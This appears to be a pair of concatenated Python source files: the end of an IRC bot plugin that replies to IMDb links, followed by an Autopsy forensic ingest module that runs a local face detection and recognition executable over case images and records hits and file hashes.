raise ValueError('Invalid api provided!')
return choices[api](plugin=plugin)
class Imdb(callbacks.Plugin):
threaded = True
def doPrivmsg(self, irc, msg):
if ircmsgs.isCtcp(msg) and not ircmsgs.isAction(msg):
return
channel = msg.args[0]
if irc.isChannel(channel):
if ircmsgs.isAction(msg):
text = ircmsgs.unAction(msg)
else:
text = msg.args[1]
movies = set(URL_REGEX.findall(text))
if movies:
api = create_api(plugin=self)
for mid in movies:
api.reply(irc, mid)
Class = Imdb
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
# -*- coding: utf-8 -*-
#
# Date: 17 September 2018
# Author: Alexandre Frazao Rosario
# Patricio Domingues
#
# Module Full Description:
# FDRI is a image analysis module that focus in finding human faces in images,
# as well finding images that contain a specific person. It provides this functionality’s appealing to AI Convolutional Neural Networks.
# The executable is a implementation of facial detection and recognition with Dlib DNN(http://dlib.net/).
#
# The facial recognition element is activated when selecting a folder with images from the person that
# the program should look for, it will look for the person and if it finds, marks it as interesting file hit.
#
# All the detectors used can be found at: https://github.com/davisking/dlib-models
#
#====================================================================
# License Apache 2.0
#====================================================================
# Copyright 2018 Alexandre Frazão Rosário
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
from datetime import datetime
import os # file checking
import shutil # file copy
import subprocess # .exe calling
import time
import signal
import hashlib
import xml.dom.minidom as m_dom
import jarray
from java.awt import BorderLayout, GridLayout, FlowLayout, Dimension
from java.awt.event import KeyAdapter, KeyEvent, KeyListener
from threading import Thread
from distutils.dir_util import copy_tree
# Java librarys
from java.io import File
from java.lang import System
from java.lang import Thread as JThread
from java.util.logging import Level
# UI librarys
from javax.swing import (BorderFactory, BoxLayout, JButton, JCheckBox,
JComponent, JFileChooser, JFrame, JLabel, JPanel,
JScrollPane, JTextField, JToolBar)
from javax.swing.event import DocumentEvent, DocumentListener
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.casemodule.services import (Blackboard, FileManager,
Services)
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.datamodel import ContentUtils
# sleuthkit librarys
from org.sleuthkit.autopsy.ingest import (DataSourceIngestModule,
FileIngestModule, IngestMessage,
IngestModule,
IngestModuleFactoryAdapter,
IngestModuleIngestJobSettings,
IngestModuleIngestJobSettingsPanel,
IngestModuleGlobalSettingsPanel,
IngestServices, ModuleDataEvent)
from org.sleuthkit.autopsy.ingest.IngestModule import IngestModuleException
from org.sleuthkit.datamodel import (AbstractFile, BlackboardArtifact,
BlackboardAttribute, SleuthkitCase,
TskData, ReadContentInputStream)
#====================================================================
# Configuration
#====================================================================
# Version of the code. We simply put the date and a letter.
C_VERSION = "2018-09-17"
# Module configurations for multiple cases
GLOBAL_CONFIGURATION_PATH = os.path.join(os.path.dirname(
os.path.abspath(__file__)), "configuration.json")
CONFIGURATION_PATH = ""
# Number of bytes to read on hashing function
BLOCKSIZE = 5120
# Minimum size for an image file to be processed (in bytes=
C_FILE_MIN_SIZE = 1025
# Name of file to hold the filenames where faces were detected
C_FACES_FOUND_FNAME = "FDRI_faces_found.txt"
# Name of file to hold the files where recognition occurred
C_FDRI_WANTED_FNAME = "FDRI_wanted.txt"
# Name of created DFXML file
C_DFXML_FNAME = "dfxml.xml"
# Name of file to register filenames and size
C_FILE_WITH_FNAMES_AND_SIZES = "FDRI_filenames+size.log.txt"
# Name of file to get the list of repeated files
C_REPEATED_FILES_LOG = "FDRI_repeated_files.log.txt"
# Name of file holding JSON parameters
C_PARAMS_JSON_FNAME="params.json"
# Label for an annotated file
C_ANNOTATED_LABEL="Annotated_"
# Represent annotated when pathname is being built
C_ANNOTATED_DIR="annotated"
# name of FDRI included in path
C_FDRI_DIR="FDRI"
# Label for GUI configuration
C_LABEL_INFO_AUTOPSY_TEMP = "Save copied images outside of Autopsy's /Temp"
# Create DFXML (internal use in this script)
C_CREATE_DFXML = True
# Compute hashes for DFXML
C_COMPUTE_HASHES = True
# Row separator
C_SEP_S = "#---------------------------------------------------------\n"
#====================================================================
# Code
#====================================================================
# Factory that defines the name and details of the module and allows Autopsy
# to create instances of the modules that will do the analysis.
class FDRIModuleFactory(IngestModuleFactoryAdapter):
moduleName = "FDRI"
moduleVersion = "V1.0"
#--------------------------------------------
# Class variables
# The variables are shared among the various
# threads that might run the module.
# (Autopsy creates several threads to process
# data sources with a FileIngest module)
#--------------------------------------------
# Register start time
g_start_time = time.time()
g_elapsed_time_secs = -1 # (impossible value)
def getModuleDisplayName(self):
return self.moduleName
def getModuleDescription(self):
return "Facial Detection and Recognition in Images"
def getModuleVersionNumber(self):
return self.moduleVersion
def isDataSourceIngestModuleFactory(self):
return True
def createDataSourceIngestModule(self, ingestOptions):
return FDRIModule(self.settings)
def hasIngestJobSettingsPanel(self):
return True
def hasGlobalSettingsPanel(self):
return True
def getGlobalSettingsPanel(self):
return UIGlobalSettingsPanel()
def getDefaultIngestJobSettings(self):
return UISettings()
def getIngestJobSettingsPanel(self, settings):
self.settings = settings
return UISettingsPanel(self.settings)
# Data Source-level ingest module. One gets created per data source.
class FDRIModule(DataSourceIngestModule):
_logger = Logger.getLogger(FDRIModuleFactory.moduleName)
def log(self, level, msg):
self._logger.logp(level, self.__class__.__name__,
inspect.stack()[1][3], msg)
def __init__(self, settings):
self.context = None
self.localSettings = settings
self.extensions = []
self.deleteAfter = False
self.doRecognition = True
self.userPaths = {
"0": "",
"1": "",
"2": ""
}
# True to create the DFXML file
self.createDFXML = C_CREATE_DFXML
# Time acumulators to determine the
# cumulative time needed to compute
# MD5, SHA1 and SHA256
self.needed_time_MD5 = 0.0
self.needed_time_SHA1 = 0.0
self.needed_time_SHA256 = 0.0
#CONFIGURATION_PATH = Case.getCurrentCase().getModuleDirectory() + "\\FDRI.json"
# Error list in acordance with .exe code
# for unknow errors please run executable via command line
self.errorList = {
1: ' FDRI.exe Parameters error',
2: ' Error loading parameter file ',
3: ' Error parsing parameter file ',
4: ' Error finding image directory ',
5: ' Error initializing recognition network ',
6: ' Error initializing shape predictor ',
7: ' Error initializing detection network ',
8: ' Didn\'t find any positive faces ',
9: ' Didn\'t find any target faces ',
10: ' CUDA out of memory ',
11: ' Didn\'t find any usable CUDA devices '
}
# Where any setup and configuration is done
# 'context' is an instance of org.sleuthkit.autopsy.ingest.IngestJobContext.
# See: http://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1ingest_1_1_ingest_job_context.html
def startUp(self, context):
# Supported file format from dlib
acceptedFiles = ['.jpg', '.jpeg', '.png']
i = 0
for ext in acceptedFiles:
if self.localSettings.getFlag(i):
self.extensions.append(ext)
i += 1
if not self.extensions:
raise IngestModuleException(
"Need to select at least one type of file!")
# self.generate_hash controls whether MD5,SHA1 and SHA256 hashes
# are added to the DFXML generated file.
if self.localSettings.getFlag(3):
self.generate_hash = True
else:
self.generate_hash = False
#
# Checking for default detectors and auxiliary files
#
self.pathToExe = os.path.join(os.path.dirname(
os.path.abspath(__file__)), "FDRI.exe")
self.defaultPaths = {
'0': os.path.join(os.path.dirname(os.path.abspath(__file__)),
"mmod_human_face_detector.dat"),
'1': os.path.join(os.path.dirname(os.path.abspath(__file__)),
"dlib_face_recognition_resnet_model_v1.dat"),
'2': os.path.join(os.path.dirname(os.path.abspath(__file__)),
"shape_predictor_5_face_landmarks.dat")
}
save_file = False
if os.path.exists(GLOBAL_CONFIGURATION_PATH):
with open(GLOBAL_CONFIGURATION_PATH, "r") as out:
content = json.load(out)
save_file = content['save_files']
self.userPaths = content['paths']
for code in self.userPaths:
if not self.userPaths[code]:
# user didn't set models path, we assume module location
self.userPaths[code] = self.defaultPaths[code]
# Update global config file
#self.log(Level.INFO, GLOBAL_CONFIGURATION_PATH)
with open(GLOBAL_CONFIGURATION_PATH, "w") as out:
json.dump({"save_files": save_file,
"paths": self.userPaths}, out)
folder_positive_photos = self.localSettings.getPath("1")
# No folder for positive photos was given: recognition OFF
if len(folder_positive_photos) == 0:
self.doRecognition = False
Msg_S = "Face recognition OFF (no folder with positive photo(s) given)"
self.log(Level.INFO,Msg_S)
elif not os.path.exists(folder_positive_photos):
# The folder with positive photo doesn' exist: recognition will
# be OFF
self.doRecognition = False
Msg_S = "Folder with positive photos NOT found: '%s'" %\
(folder_positive_photos)
self.log(Level.WARNING,Msg_S)
else:
# Ok, recognition is ON
self.doRecognition = True
Msg_S = "Face recognition ON (folder positive photo(s):'%s')"%\
(folder_positive_photos)
self.log(Level.INFO,Msg_S)
with open(Case.getCurrentCase().getModuleDirectory() + "\\config.json", 'w') as safe_file:
json.dump({"flags": self.localSettings.getAllFlags(), "wanted_folder": folder_positive_photos}, safe_file)
# Activate for DEBUG
#with open(CONFIGURATION_PATH, "w") as out:
# json.dump({"flags": self.localSettings.getAllFlags(),
# "paths": self.localSettings.getAllPaths()}, out)
self.context = context
#--------------------------------------------------------------------
# Added by Patricio
# 2018-07-21
#--------------------------------------------------------------------
def shutDown(self):
"""shutdown code"""
# Elaspsed time
FDRIModuleFactory.g_elapsed_time_secs = time.time() -\
FDRIModuleFactory.g_start_time
Log_S = "Total elapsed time: %f secs" %\
(FDRIModuleFactory.g_elapsed_time_secs)
self.log(Level.INFO, Log_S)
# Where the analysis is done.
# The 'dataSource' object being passed in is of type org.sleuthkit.datamodel.Content.
# See: http://www.sleuthkit.org/sleuthkit/docs/jni-docs/4.4.1/interfaceorg_1_1sleuthkit_1_1datamodel_1_1_content.html
# 'progressBar' is of type org.sleuthkit.autopsy.ingest.DataSourceIngestModuleProgress
# See: http://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1ingest_1_1_data_source_ingest_module_progress.html
def process(self, dataSource, progressBar):
# we don't know how much work there is yet
progressBar.switchToIndeterminate()
# Start timer for file copy operation
start_copy_time = time.time()
# case insensitive SQL LIKE clause is used to query the case database
# FileManager API: http://sleuthkit.org/autopsy/docs/api-docs/4.4.1/classorg_1_1sleuthkit_1_1autopsy_1_1casemodule_1_1services_1_1_file_manager.html
fileManager = Case.getCurrentCase().getServices().getFileManager()
files = []
for extension in self.extensions:
try:
files.extend(fileManager.findFiles(
dataSource, "%" + extension))
except TskCoreException:
self.log(Level.INFO, "Error getting files from: '" +
extension + "'")
numFiles = len(files)
if not numFiles:
self.log(Level.WARNING, "Didn't find any usable files!")
return IngestModule.ProcessResult.OK
# Check if the user pressed cancel while we were busy
if self.context.isJobCancelled():
return IngestModule.ProcessResult.OK
output_dir = Case.getCurrentCase().getModuleDirectory()
module_dir = os.path.join(output_dir,dataSource.getName(),C_FDRI_DIR)
# Create top-level DIR to save FDIR's created files
full_dirname_dataSource = os.path.join(output_dir,dataSource.getName())
if not os.path.exists(full_dirname_dataSource):
os.mkdir(full_dirname_dataSource)
# TEMP is needed by Autopsy
temp_dir = os.path.join(Case.getCurrentCase().getTempDirectory(),
dataSource.getName())
if not os.path.exists(temp_dir):
os.mkdir(temp_dir)
temp_dir = os.path.join(temp_dir, C_FDRI_DIR)
if not os.path.exists(temp_dir):
os.mkdir(temp_dir)
# We always copy the files (except if a copy already exists)
# as we will want to change them.
# We detect the existence of a previous copy if the creation of the dir
# 'module_dir' triggers an exception
try:
os.mkdir(module_dir)
except:
self.log(Level.INFO, "Directory already exists for this module")
#----------------------------------------
# Init file which holds filenames + size
#----------------------------------------
file_path = os.path.join(module_dir,C_FILE_WITH_FNAMES_AND_SIZES)
fnames_and_sizes_F = open(file_path,"w")
fnames_and_sizes_F.write(C_SEP_S)
fnames_and_sizes_F.write("# Filename:size (bytes)\n")
timestamp_S = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
fnames_and_sizes_F.write("# START: %s\n" % (timestamp_S))
fnames_and_sizes_F.write(C_SEP_S)
# Dict to detect identical files
files_hash_D = {}
# Flag to record whether files were copied or not
were_files_copied = True
# Minimum size (in bytes) for an image file to be processed
total_files = 0
total_small_files = 0
# A initial version mispelled 'Annotated"...
avoid_prefix_1 = "Anotated_"
avoid_prefix_2 = "Annotated_"
try:
dir_img = os.path.join(module_dir,"img")
os.mkdir(dir_img)
dir_small_files = os.path.join(module_dir,"small_files") + "\\"
os.mkdir(dir_small_files)
for file in files:
total_files = total_files + 1
filename_S = file.getName()
Log_S = ""
if filename_S.find(avoid_prefix_1) is 0:
Log_S = "%s file found '%s': skipping" %\
(avoid_prefix_1,filename_S)
elif filename_S.find(avoid_prefix_2) is 0:
Log_S = "%s file found '%s': skipping" %\
(avoid_prefix_2,filename_S)
if len(Log_S):
# Annotated_ found
# Log and skip this file
self.log(Level.INFO, Log_S)
continue
file_size = file.getSize()
filename, file_extension = os.path.splitext(file.getName())
# Record filename and file size in C_FILE_WITH_FNAMES_AND_SIZES
fnames_and_sizes_F.write("%s:%d\n" %(file.getName(),file_size))
# If file size is more than C_FILE_MIN_SIZE
# TODO:: User Choice as option
if file_size >= C_FILE_MIN_SIZE:
new_fname = "%s__id__%s%s" %\
(filename,str(file.getId()),file_extension)
fullpath_dest = os.path.join(dir_img,new_fname)
ContentUtils.writeToFile(file, File(fullpath_dest))
# We copy small files to a different DIR, so that we
# can look at them, if needed
if file_size < C_FILE_MIN_SIZE:
total_small_files = total_small_files + 1
dest_filename = "%s%s__id__%d%s" %\
(dir_small_files,filename,file.getId(),file_extension)
ContentUtils.writeToFile(file, File(dest_filename))
Log_S = "Skipping file: %s (%d bytes)" %\
(file.getName(),file.getSize())
# LOG
self.log(Level.INFO, Log_S)
#--------------------------------
# Code to detect repeated files
# We simply use a dictionary
# keyed by the MD5 of the file
# Patricio
#--------------------------------
if file_size > 0:
md5_hash = self.create_hash(file, "md5")
if md5_hash in files_hash_D:
# hash already exists: repetition
files_hash_D[md5_hash].append(file.getName())
else:
# hash doesn't yet exist in dictionary: 1st time
files_hash_D[md5_hash] = [file_size,file.getName()]
##except:
except Exception, e:
were_files_copied = False
self.log(Level.INFO,"Image folder already exists, skiping file copy")
self.log(Level.INFO,"Exception: " + str(e))
#----------------------------------------
# Close filename+size file
# Patricio
#----------------------------------------
timestamp_S = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
fnames_and_sizes_F.write("# DONE: %s\n" % (timestamp_S))
if were_files_copied is False:
Msg_S = "# Exception occurred\n"
fnames_and_sizes_F.write(Msg_S)
fnames_and_sizes_F.close()
#----------------------------------------
# Dump hash with repeated files
# (only if files were copied)
#----------------------------------------
if were_files_copied is True:
file_path = os.path.join(module_dir,C_REPEATED_FILES_LOG)
repeated_files_log_F = open(file_path,"w")
repeated_files_log_F.write(C_SEP_S)
repeated_files_log_F.write("# Repeated files\n")
timestamp_S = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
repeated_files_log_F.write("# %s\n" % (timestamp_S))
repeated_files_log_F.write(C_SEP_S)
for key, info_L in files_hash_D.iteritems():
if len(info_L) > 2:
# only list with more than 2 entries
# (one entry is the file size)
S = ""
for datum in info_L:
S = "%s%s:" % (S,datum)
repeated_files_log_F.write("%s\n" %(S))
repeated_files_log_F.write(C_SEP_S)
repeated_files_log_F.write("# DONE: %s\n" % (timestamp_S))
repeated_files_log_F.write(C_SEP_S)
repeated_files_log_F.close()
#----------------------------------------
# Log stats
#----------------------------------------
# shutdown copy file timer
elapsed_copy_time_secs = time.time() - start_copy_time
Log_S = "%d image files (%d of these were left out -- size <= "\
"%d bytes)" % (total_files, total_small_files,C_FILE_MIN_SIZE)
self.log(Level.INFO, Log_S)
total_copied_files = total_files - total_small_files
Log_S = "Files copy operation (%d files) took %f secs" %\
(total_copied_files,elapsed_copy_time_secs)
self.log(Level.INFO, Log_S)
#----------------------------------------
# Start processing timer
#----------------------------------------
start_FDRIexe_time = time.time()
# Location where the output of executable will appear
timestamp = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
workspace = os.path.join(module_dir,timestamp)
configFilePath = os.path.join(workspace,C_PARAMS_JSON_FNAME)
os.mkdir(workspace)
with open(configFilePath, "w") as out:
json.dump({
"paths": self.userPaths,#self.localSettings.getAllPaths(),
"wanted_faces" : self.localSettings.getPath("1"),
"imagesPath": os.path.join(module_dir,"img"),
"doRecognition": self.doRecognition,
"workspace": workspace,
}, out)
#
# Different calls can also be provided to specify the image size
#
# Note that 2GB of GPU memory handle around 2000*2000 images
# Note that 4GB of GPU memory handle around 3500*3500 images
# Note that 8GB of GPU memory handle around 6000*6000 images
#
# Example:
# Required Minimum size Maximum size
# target=lambda: self.thread_work(self.pathToExe, configFilePath, 1200*1200, 2000*2000))
# target=lambda: self.thread_work(self.pathToExe, configFilePath, 1200*1200))
executable_thread = Thread(
target=lambda: self.thread_work(self.pathToExe, configFilePath))
executable_thread.start()
while(executable_thread.isAlive()):
if self.context.isJobCancelled():
self.log(Level.INFO, "User cancelled job! Terminating thread")
JThread.interrupt(executable_thread)
self.log(Level.INFO, "Thread terminated")
self.deleteFiles(module_dir)
return IngestModule.ProcessResult.OK
time.sleep(1)
# Checking if cancel was pressed before starting another job
if self.context.isJobCancelled():
return IngestModule.ProcessResult.OK
#----------------------------------------
# Compute time takne by FDRI.exe
#----------------------------------------
elapsed_FDRIexe_time_secs = time.time() - start_FDRIexe_time
Log_S = "Process of image files by FDRI.exe took %f secs" %\
(elapsed_FDRIexe_time_secs)
self.log(Level.INFO, Log_S)
#----------------------------------------
# Start timer of last stage
#----------------------------------------
self.log(Level.INFO, "START of last stage")
start_last_stage_time = time.time()
# Use blackboard class to index blackboard artifacts for keyword search
blackboard = Case.getCurrentCase().getServices().getBlackboard()
# Tag files with faces
artifact_type = BlackboardArtifact.ARTIFACT_TYPE.TSK_INTERESTING_FILE_HIT
# Copy files from workspace to temp_dir
tree_source = os.path.join(workspace, C_ANNOTATED_DIR)
tree_destination = os.path.join(temp_dir, C_ANNOTATED_DIR)
copy_tree(tree_source,tree_destination)
# Add images with the wanted faces to blackboard
outPositiveFile = os.path.join(workspace,C_FDRI_WANTED_FNAME)
if os.path.exists(outPositiveFile):
with open(outPositiveFile, "r") as out:
for line in out:
file_id = line.split('__id__')[1].split('.')
interestingFile = self.findByID(files, file_id[0])
if interestingFile == None:
continue
# Creating new artifacts with faces found
artifactList = interestingFile.getArtifacts(artifact_type)
if artifactList:
self.log(
Level.INFO, "Artifact already exists! ignoring")
else:
art = interestingFile.newArtifact(artifact_type)
att = BlackboardAttribute(BlackboardAttribute.ATTRIBUTE_TYPE.TSK_SET_NAME.getTypeID(),
FDRIModuleFactory.moduleName, dataSource.getName() + "/Wanted faces")
art.addAttribute(att)
try:
# index the artifact for keyword search
blackboard.indexArtifact(art)
except Blackboard.BlackboardException as e:
self.log(
Level.SEVERE, "Error indexing artifact " + art.getDisplayName())
# Adding derivated files to case
# These are files with borders on the found faces
# Code to deal with filenames with multiple "."
# Patricio, 2018.08.09
interestingFName = interestingFile.getName()
try:
name, extension = self.split_fname(interestingFName)
except Exception, e:
Err_S = "Error in splitting name/extension of '%s' (skipping file)" % (interestingFName)
self.log(Level.SEVERE,Err_S)
self.log(Level.SEVERE,"Exception: " + str(e))
continue
# Still here? Good.
f_path = "%s__id__%s.%s" %\
(name,str(interestingFile.getId()),extension)
# We need path relative to temp folder for Autopsy API
f_temp_path = os.path.join("Temp",dataSource.getName(),
C_FDRI_DIR, C_ANNOTATED_DIR, f_path)
f_abs_path = os.path.join(workspace,
C_ANNOTATED_DIR, f_path)
# Temporary fix
if os.path.exists(f_abs_path):
f_size = os.path.getsize(f_abs_path)
case = Case.getCurrentCase().getSleuthkitCase()
try:
abstract_f = case.getAbstractFileById(
interestingFile.getId())
# https://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1casemodule_1_1services_1_1_file_manager.html
label_S = C_ANNOTATED_LABEL + interestingFName
case.addDerivedFile(label_S, f_temp_path,
f_size, 0, 0, 0, 0, True, abstract_f,
"", FDRIModuleFactory.moduleName,
FDRIModuleFactory.moduleVersion,
"Image with faces",
TskData.EncodingType.NONE)
except:
self.log(Level.SEVERE,"Error getting abs file")
if self.generate_hash:
dfxml_path = os.path.join(workspace,C_DFXML_FNAME)
self.complete_dfxml( dfxml_path, interestingFile)
# Name of file that holds the data regarding detected faces
# Each row corresponds to a detected face
outPositiveFile = os.path.join(workspace,C_FACES_FOUND_FNAME)
self.log(Level.INFO,"File with found faces from FDRI.exe:'%s'" %\
(outPositiveFile))
# Count the number of images where at least one face was detected
images_with_faces_count = 0
if os.path.exists(outPositiveFile):
with open(outPositiveFile, "r") as out:
for line in out:
# Another file with at least one face
images_with_faces_count += 1
file_id = line.split('__id__')[1].split('.')
interestingFile = self.findByID(files, file_id[0])
if interestingFile == None:
continue
# Creating new artifacts with faces found
artifactList = interestingFile.getArtifacts(artifact_type)
if artifactList:
self.log(Level.INFO,"Artifact already exists! ignoring")
else:
art = interestingFile.newArtifact(artifact_type)
att = BlackboardAttribute(BlackboardAttribute.ATTRIBUTE_TYPE.TSK_SET_NAME.getTypeID(),
FDRIModuleFactory.moduleName, dataSource.getName() + "/Images with faces")
art.addAttribute(att)
try:
# index the artifact for keyword search
blackboard.indexArtifact(art)
except Blackboard.BlackboardException as e:
self.log(Level.SEVERE,
"Error indexing artifact " + art.getDisplayName())
# Adding derivated files to case
# These are files with borders on the found faces
# Code to deal with filenames with multiple "."
# Patricio, 2018.08.09
interestingFName = interestingFile.getName()
try:
name, extension = self.split_fname(interestingFName)
except Exception, e:
Err_S = "Error in splitting name/extension of '%s' (skipping file)" % (interestingFName)
self.log(Level.SEVERE,Err_S)
self.log(Level.SEVERE,"Exception: " + str(e))
continue
# Still here? Good.
f_path = "%s__id__%s.%s" %\
(name,str(interestingFile.getId()),extension)
# We need path relative to temp folder since the
# Autopsy's API requires files in the case's
# TEMP folder
f_temp_path = os.path.join("Temp",dataSource.getName(),
C_FDRI_DIR, C_ANNOTATED_DIR, f_path)
f_abs_path = os.path.join(workspace,
C_ANNOTATED_DIR, f_path)
# Temporary fix
if os.path.exists(f_abs_path):
f_size = os.path.getsize(f_abs_path)
case = Case.getCurrentCase().getSleuthkitCase()
try:
abstract_f = case.getAbstractFileById(
interestingFile.getId())
# https://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1casemodule_1_1services_1_1_file_manager.html
label_S = C_ANNOTATED_LABEL + interestingFName
case.addDerivedFile(label_S, f_temp_path,
f_size, 0, 0, 0, 0, True, abstract_f,
"", FDRIModuleFactory.moduleName,
FDRIModuleFactory.moduleVersion,
"Image with faces",
TskData.EncodingType.NONE)
except:
self.log(Level.SEVERE,
"Error getting abs file")
if self.generate_hash:
dfxml_path = workspace + "\\" + C_DFXML_FNAME
self.complete_dfxml(dfxml_path, interestingFile)
#----------------------------------------
# End timer of last stage
#----------------------------------------
last_stage_time = time.time() - start_last_stage_time
Log_S = "Last stage took %f secs" % (last_stage_time)
self.log(Level.INFO, Log_S)
if C_COMPUTE_HASHES:
Log_S = "hashes took: MD5=%f secs; SHA1=%f secs; SHA256=%f secs" %\
(self.needed_time_MD5, self.needed_time_SHA1, self.needed_time_SHA256)
else:
Log_S = "hashes NOT computed"
self.log(Level.INFO, Log_S)
IngestServices.getInstance().fireModuleDataEvent(
ModuleDataEvent(FDRIModuleFactory.moduleName,
BlackboardArtifact.ARTIFACT_TYPE.TSK_INTERESTING_FILE_HIT, None))
# Should we delete the IMG files? (user's configuration)
if self.deleteAfter:
Msg_S = "Going to delete image files (as required by the user)"
self.log(Level.INFO,Msg_S)
dir_to_del = os.path.join(output_dir,dataSource.getName())
self.deleteFiles(dir_to_del)
# End time measurement
FDRIModuleFactory.g_elapsed_time_secs = time.time() -\
FDRIModuleFactory.g_start_time
#------------------------------------------------------------
# Format message to be shown at "Ingest messages"
#------------------------------------------------------------
if self.doRecognition:
recognition_S = "ON"
else:
recognition_S = "OFF"
ingest_msg_S = "Found %d images with faces: %f secs (FDRI.exe:%f secs). Recognition:%s" %\
(images_with_faces_count, FDRIModuleFactory.g_elapsed_time_secs,
elapsed_FDRIexe_time_secs, recognition_S)
message = IngestMessage.createMessage( IngestMessage.MessageType.DATA,
FDRIModuleFactory.moduleName, ingest_msg_S)
IngestServices.getInstance().postMessage(message)
return IngestModule.ProcessResult.OK
#==========================================================================
# Helper functions
#==========================================================================
# File cleanup
def deleteFiles(self, path):
# ignoring the error if the directory is empty
shutil.rmtree(path, ignore_errors=True)
# Subprocess initiator
def thread_work(self, path, param_path, min_size=0, max_size=0):
sub_args = [path, "--params", param_path]
if min_size > 0:
sub_args.extend(["--min", str(min_size)])
if max_size > 0:
sub_args.extend(["--max", str(max_size)])
returnCode = subprocess.call(sub_args)
if returnCode:
Err_S = "Error in executable: got '%s'" % (str(returnCode))
self.log(Level.SEVERE,Err_S)
if returnCode <= len(self.errorList) and returnCode > 0:
self.log(Level.SEVERE, self.errorList[returnCode])
else:
msg_S = "Child process FDRI.exe terminated with no problems"
self.log(Level.INFO, msg_S)
#----------------------------------------------------------------
# File mapping from temp folder to Autopsy files
#----------------------------------------------------------------
def findByID(self, file_list, id):
for file in file_list:
if file.getId() == int(id):
return file
return None
#----------------------------------------------------------------
# Complete the DFMXL file, adding the hashes
# (MD5, SHA1 and SHA256) of each individual file.
#----------------------------------------------------------------
def complete_dfxml(self, dfxml_path, file):
xml_doc = None
# Should we compute hashes?
do_compute_hashes = C_COMPUTE_HASHES
with open(dfxml_path, "r") as dfxml:
xml_doc = m_dom.parse(dfxml)
file_elements = xml_doc.getElementsByTagName("fileobject")
if file.isFile() and file.canRead():
#----------------------
# Append file hashes
#----------------------
# SHA1
hash_nodeSHA1 = xml_doc.createElement("hashdigest")
if do_compute_hashes:
(sha1_hash,time_used) = self.create_hash(file, "sha1")
self.needed_time_SHA1 = self.needed_time_SHA1 + time_used
else:
sha1_hash = "0"
hash_nodeSHA1.setAttribute("type", "sha1")
hash_nodeSHA1.appendChild(xml_doc.createTextNode(sha1_hash))
# SHA256
hash_nodeSHA256 = xml_doc.createElement("hashdigest")
if do_compute_hashes:
(sha256_hash,time_used) = self.create_hash(file, "sha256")
self.needed_time_SHA256 = self.needed_time_SHA256+time_used
else:
sha256_hash = "0"
hash_nodeSHA256.setAttribute("type", "sha256")
hash_nodeSHA256.appendChild(xml_doc.createTextNode(sha256_hash))
# MD5
hash_nodeMD5 = xml_doc.createElement("hashdigest")
if do_compute_hashes:
(md5_hash,time_used) = self.create_hash(file, "md5")
self.needed_time_MD5 = self.needed_time_MD5 + time_used
else:
md5_hash = "0"
hash_nodeMD5.setAttribute("type", "md5")
hash_nodeMD5.appendChild(xml_doc.createTextNode(md5_hash))
for element in file_elements:
file_name_node=element.getElementsByTagName("filename")[0]
if file_name_node.firstChild.nodeValue == file.getName().split(".")[0]:
element.appendChild(hash_nodeSHA1)
element.appendChild(hash_nodeSHA256)
element.appendChild(hash_nodeMD5)
with open(dfxml_path, "w") as out:
xml_doc.writexml(out, encoding="utf-8")
#----------------------------------------------------------------
# Hash calculation, Autopsy seems to not provide these
#----------------------------------------------------------------
def create_hash(self, f_target, algorithm):
time_start = time.time()
hash_creator = hashlib.new(algorithm)
inputStream = ReadContentInputStream(f_target)
buffer = jarray.zeros(BLOCKSIZE, "b")
len = inputStream.read(buffer)
while (len != -1):
hash_creator.update(buffer)
len = inputStream.read(buffer)
time_consumed = time.time()-time_start
return (hash_creator.hexdigest(),time_consumed)
#--------------------------------------------------------------------
# Split filename into basename and extension
#--------------------------------------------------------------------
def split_fname(self, fname):
if fname is None or len(fname)==0:
return "",""
fname_L = fname.split(".")
fname_L_len = len(fname_L)
if fname_L_len == 1:
# No extension
return fname,""
# Still here?
if fname_L_len == 2:
# simple: name + extension
return fname_L[0],fname_L[1]
else:
name_S = ""
for elm in fname_L[:-1]:
name_S = name_S + "." + elm
return name_S,fname_L[fname_L_len-1]
#----------------------------------------------------------------------
# Global settings UI class, responsible for AI models weights location
# This is case independent
#----------------------------------------------------------------------
class UIGlobalSettingsPanel(IngestModuleGlobalSettingsPanel):
def __init__(self):
self.save_file_cbox = JCheckBox(C_LABEL_INFO_AUTOPSY_TEMP)
## "Save copied images outside of AUTOPSY's temp"
self.textInputs = {
'0': JTextField('', 30),
'1': JTextField('', 30),
'2': JTextField('', 30)
}
self.buttons = {
'0': JButton("Choose file", actionPerformed=self.chooseFolder),
'1': JButton("Choose file", actionPerformed=self.chooseFolder),
'2': JButton("Choose file", actionPerformed=self.chooseFolder)
}
self.initComponents()
self.load()
def checkBoxEvent(self, event):
self.save_files = self.save_file_cbox.isSelected()
def saveSettings(self):
all_paths = {}
for code in self.textInputs:
all_paths[code] = self.textInputs[code].text
with open(GLOBAL_CONFIGURATION_PATH, "w") as out:
json.dump({
"save_files": self.save_file_cbox.isSelected(),
"paths": all_paths
}, out)
def load(self):
# Load settings from file
if os.path.exists(GLOBAL_CONFIGURATION_PATH):
with open(GLOBAL_CONFIGURATION_PATH, "r") as out:
content = json.load(out)
# self.save_file_cbox.setSelected(content['save_files'])
self.textInputs['0'].text = content['paths']['0']
self.textInputs['1'].text = content['paths']['1']
self.textInputs['2'].text = content['paths']['2']
def chooseFolder(self, e):
button = e.getSource()
code = button.getActionCommand()
fileChooser = JFileChooser()
fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY)
ret = fileChooser.showDialog(self, "Choose folder")
if ret == JFileChooser.APPROVE_OPTION:
